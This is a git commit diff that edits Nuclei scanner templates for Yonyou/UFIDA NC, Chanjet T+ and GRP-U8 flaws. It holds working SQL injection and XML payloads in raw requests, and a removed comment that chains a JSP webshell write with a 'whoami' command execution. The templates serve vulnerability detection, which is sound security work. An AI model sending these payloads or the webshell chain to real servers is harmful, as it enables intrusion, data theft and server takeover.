updated-templates-p

patch-1
Prince Chaddha 2023-09-17 14:21:38 +05:30
parent 88153faaf8
commit 274c14e763
14 changed files with 29 additions and 81 deletions

View File

@ -1,11 +1,11 @@
id: yonyou-nc-uapjs-jsinvoke-fileupload
id: CNVD-C-2023-76801
info:
name: Yonyou NC uapjs jsinvoke 文件上传漏洞
name: UFIDA NC uapjs - RCE vulnerability
author: SleepingBag945
severity: critical
description: 用友NC 及 NCC系统存在任意方法调用漏洞通过uapjs (jsinvoke)利用漏洞可调用危险方法造成攻击。
tags: yonyou
description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.
tags: cvnd,cvnd2023,yonyou,rce
http:
- raw:
@ -28,15 +28,3 @@ http:
- status_code_1 == 200
- status_code_2 == 200 && contains(body_2,"{{randstr_2}}")
condition: and
# POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
# Host: {{Hostname}}
# {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]}
# POST /cmdb.jsp?error=bsh.Interpreter HTTP/1.1
# Host: {{Hostname}}
# cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())

View File

@ -10,7 +10,7 @@ info:
max-request: 1
fofa-query: app="ZyXEL-USG-FLEX"
verified: true
tags: cve,cve2022,zyxel,auth-bypass
tags: cve,cve2022,zyxel,auth-bypass,router
http:
- method: GET

View File

@ -5,7 +5,7 @@ info:
author: SleepingBag945
severity: high
description: |
Changjietong Information Technology Co., Ltd. is a company dedicated to providing platform services, application services, and data value-added services with financial and management services as its core to China's small and micro enterprises. Changjietong Information Technology Co., Ltd. Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
reference: |
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
@ -38,14 +38,8 @@ http:
part: body_1
words:
- "{\"RetCode\":0}"
condition: and
- type: word
part: body_2
words:
- "{\"RetCode\":2}"
condition: and
- type: status
status:
- 200

View File

@ -28,6 +28,7 @@ http:
- "<configuration>"
condition: and
- type: status
status:
- 200
- type: word
part: header
words:
- "application/octet-stream"

View File

@ -3,7 +3,7 @@ id: chanjet-tplus-fileupload
info:
name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload
author: SleepingBag945
severity: critical
severity: high
description: |
There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server.
reference:

View File

@ -20,20 +20,15 @@ http:
POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
{"AccountNum":"123 or 8767 IN (SELECT (sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))))","UserName":"admin","Password":"e10adc3949ba59abbe56e057f20f883e","rdpYear":"2021","rdpMonth":"12","rdpDate":"9","webServiceProcessID":"admin","ali_csessionid":"","ali_sig":"","ali_token":"","ali_scene":"","role":"","aqdKey":"","fromWhere":"browser","cardNo":""}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "0x06d49632c9dc9bcb62aeaef99612ba6b"
- "Message\":\"245"
- "DatabaseException"
part: body
condition: and
- type: status
status:
- 200

View File

@ -1,21 +0,0 @@
id: chanjetcrm-createsite-sqli
info:
name: Chanjetcrm - create_site SQL Injection
author: unknown
severity: critical
description: |
There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
reference:
- https://stack.chaitin.com/techblog/detail?id=10
tags: chanjetcrm,sqli
http:
- method: GET
path:
- "{{BaseURL}}/WebSer~1/create_site.php?site_id=1"
matchers:
- type: word
words:
- "register fail,please again"
part: body

View File

@ -1,4 +1,4 @@
id: yonyou-nc-filereceiveservlet-fileupload
id: yonyou-filereceiveservlet-fileupload
info:
name: Yonyou NC FileReceiveServlet - Aribitrary File Upload
@ -12,7 +12,7 @@ info:
max-request: 1
fofa-query: app="用友-UFIDA-NC"
verified: true
tags: yonyou,nc,fileupload,intrusive
tags: yonyou,fileupload,intrusive
variables:
file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"

View File

@ -1,10 +1,10 @@
id: yonyou-grp-u8-sqli
id: yonyou-grp-u8-xxe
info:
name: yonyou-grp-u8-sqli
name: Yonyou UFIDA GRP-u8 - XXE
author: SleepingBag945
severity: critical
description: 用友GRP-u8存在XXE漏洞该漏洞源于应用程序解析XML输入时没有进制外部实体的加载导致可加载外部SQL语句以及命令执行
description: UFIDA GRP-u8 has an XXE vulnerability. This vulnerability is caused by the application not loading external entities when parsing XML input, resulting in the loading of external SQL statements and command execution.
reference:
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
tags: yonyou,grp,xxe,sqli
@ -14,26 +14,17 @@ http:
- |
POST /Proxy HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%2042540%2a41369%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
matchers-condition: and
matchers:
- type: word
words:
- "1759837260"
- type: word
words:
- "<R9PACKET>"
- type: status
status:
- 200
# 可尝试启动并调用xpcmdshell执行命令

View File

@ -22,5 +22,5 @@ http:
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(body_1,"java.io")'
- 'status_code_1 == 200 && contains(body_1,"java.io") && contains(body_1,"EOFExceptionYI")'
condition: and

View File

@ -11,7 +11,7 @@ info:
metadata:
fofa-query: icon_hash="1085941792"
verified: true
tags: yonyou,nc,intrusive
tags: yonyou,intrusive,fileupload
http:
- raw:

View File

@ -13,7 +13,7 @@ info:
max-request: 2
fofa-query: app="用友-UFIDA-NC
verified: true
tags: yonyou,nc,intrusive
tags: yonyou,intrusive,ufida,fileupload
variables:
v1: "{{rand_int(1,100)}}"

View File

@ -1,7 +1,7 @@
id: yonyou-nc-ncmessageservlet-rce
info:
name: UFIDA NC NCMessageServlet - Deserialization RCE Detect
name: UFIDA NC NCMessageServlet - Deserialization RCE Detection
author: SleepingBag945
severity: critical
description: |
@ -12,7 +12,7 @@ info:
max-request: 2
fofa-query: app="用友-UFIDA-NC
verified: true
tags: yonyou,rce,deserialization,nc
tags: yonyou,rce,deserialization,rce
http:
- raw: